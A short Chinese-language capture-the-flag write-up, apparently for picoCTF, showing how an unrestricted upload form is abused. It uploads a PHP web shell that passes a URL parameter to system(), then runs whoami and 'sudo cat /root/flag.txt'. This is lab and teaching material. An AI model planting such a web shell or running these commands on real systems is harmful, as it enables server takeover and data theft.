首先,開啟指定網址後,會看到一個簡單的選擇檔案與上傳按鈕
從原始碼也能發現,上傳暫時沒有做任何限制,並且上傳後會POST到 upload.php
所以寫個簡單的WebShell,如下:
<?php
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}?>
上傳後,可以得知剛剛上傳的檔案路徑uploads/webshell.php
接著,就能在URL中用?cmd=XXX下指令
先試看看 whoami,確實給出使用者名稱
那就直接依題目給的路徑去找 flag
所以把指令改成:cat /root/flag.txt
嗯…空白的,可能權限不夠,加個 sudo 看看
sudo cat /root/flag.txt
FLAG: picoCTF{wh47_*****}
